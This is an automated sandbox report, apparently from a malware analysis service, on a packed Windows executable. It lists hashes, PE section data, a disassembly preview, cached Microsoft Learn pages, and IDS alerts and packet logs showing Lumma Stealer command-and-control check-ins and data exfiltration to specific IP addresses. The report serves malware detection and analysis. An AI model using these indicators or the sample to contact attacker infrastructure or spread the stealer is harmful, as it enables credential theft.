Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://learn.microsoft.com/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	dropped
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.574035977652735
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rwFNJ4pHWG.exe
File size:	2'955'776 bytes
MD5:	87e3d63f63a76cf5d2567f56880a719b
SHA1:	487be96de3684004bd047c3eb8a80ef7e3ea7e82
SHA256:	708a29fff997e6df811736dd1043cb76dc748cabd4cc4da7829315d5b66ede23
SHA512:	0c3d630a943faa85ea51aa1d05eed78ff0e1d17101a0fa2acf5f9702a9d383db1956c54b244d4bd694e405cac9aa783eda0c38d89535b070e4759279ae59d69e
SSDEEP:	49152:X7++GyYdTSgIUUTJTNFZf2S6YSUeAVHcT:XS+GyYdTSJUUTJTNFZf2S6jsB
TLSH:	65D55A91B98A79CFE48A13B8E427CD426D6C02F50B194AC3A87CE0F97E63CC551F6C65
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@...........................0.......-...@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x6fe000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FAD0CB46B2Ah
psubb mm5, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FAD0CB48B25h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	92afc98cbc1a06c3dfae021a3a4bceea	False	0.9995915032679739	data	7.978610804336836	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xjxrrozg	0x55000	0x2a8000	0x2a7c00	b691f5b075b56d4537b4eaa402d3da43	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uupzbzni	0x2fd000	0x1000	0x600	3e63ac120158b2eabc2e2b84cbee5975	False	0.5729166666666666	data	4.927357761667594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x2fe000	0x3000	0x2200	68264393cb38ea3179f611f6149be3bd	False	0.06456801470588236	DOS executable (COM)	0.7918742849015108	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T12:41:22.610014+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49709	172.67.165.185	443	TCP
2024-12-26T12:41:23.374852+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49709	172.67.165.185	443	TCP
2024-12-26T12:41:23.374852+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49709	172.67.165.185	443	TCP
2024-12-26T12:41:24.845215+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49715	172.67.165.185	443	TCP
2024-12-26T12:41:25.615223+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49715	172.67.165.185	443	TCP
2024-12-26T12:41:25.615223+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49715	172.67.165.185	443	TCP
2024-12-26T12:41:27.556216+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49721	172.67.165.185	443	TCP
2024-12-26T12:41:28.612463+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49721	172.67.165.185	443	TCP
2024-12-26T12:41:30.036215+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49726	172.67.165.185	443	TCP
2024-12-26T12:41:32.499966+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49732	172.67.165.185	443	TCP
2024-12-26T12:41:35.207848+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49742	172.67.165.185	443	TCP
2024-12-26T12:41:37.752831+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49750	172.67.165.185	443	TCP
2024-12-26T12:41:42.821504+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49762	172.67.165.185	443	TCP
2024-12-26T12:41:43.614601+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49762	172.67.165.185	443	TCP
2024-12-26T12:41:45.169485+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.7	49768	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:41:13.778134108 CET	49677	443	192.168.2.7	20.50.201.200
Dec 26, 2024 12:41:15.481359005 CET	49675	443	192.168.2.7	104.98.116.138
Dec 26, 2024 12:41:15.481378078 CET	49674	443	192.168.2.7	104.98.116.138
Dec 26, 2024 12:41:15.512559891 CET	49672	443	192.168.2.7	104.98.116.138
Dec 26, 2024 12:41:16.762589931 CET	49677	443	192.168.2.7	20.50.201.200
Dec 26, 2024 12:41:21.297101974 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:21.297143936 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:21.297287941 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:21.301116943 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:21.301131010 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:21.715672016 CET	49671	443	192.168.2.7	204.79.197.203
Dec 26, 2024 12:41:22.609889984 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:22.610013962 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:22.612900972 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:22.612911940 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:22.613348961 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:22.661613941 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:22.661659956 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:22.661736965 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:22.715639114 CET	49677	443	192.168.2.7	20.50.201.200
Dec 26, 2024 12:41:23.374886990 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:23.375009060 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:23.375077963 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:23.525649071 CET	49709	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:23.525680065 CET	443	49709	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:23.539625883 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:23.539688110 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:23.539757967 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:23.540055037 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:23.540070057 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:24.845144033 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:24.845215082 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:24.846504927 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:24.846513033 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:24.846808910 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:24.848109961 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:24.848134041 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:24.848205090 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.090656996 CET	49674	443	192.168.2.7	104.98.116.138
Dec 26, 2024 12:41:25.090673923 CET	49675	443	192.168.2.7	104.98.116.138
Dec 26, 2024 12:41:25.121881008 CET	49672	443	192.168.2.7	104.98.116.138
Dec 26, 2024 12:41:25.615228891 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.615325928 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.615361929 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.615427017 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.615453959 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.615475893 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.615485907 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.615493059 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.615534067 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.623719931 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.632361889 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.632417917 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.632468939 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.632503033 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.632563114 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.735100031 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.778117895 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.825666904 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.829644918 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.829699993 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.829823017 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:25.829902887 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.830018044 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.830018044 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.830044031 CET	49715	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:25.830066919 CET	443	49715	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:26.252206087 CET	49721	443	192.168.2.7	172.67.165.185
Dec 26, 2024 12:41:26.252264977 CET	443	49721	172.67.165.185	192.168.2.7
Dec 26, 2024 12:41:26.252331972 CET	49721	443	192.168.2.7	172.67.165.185
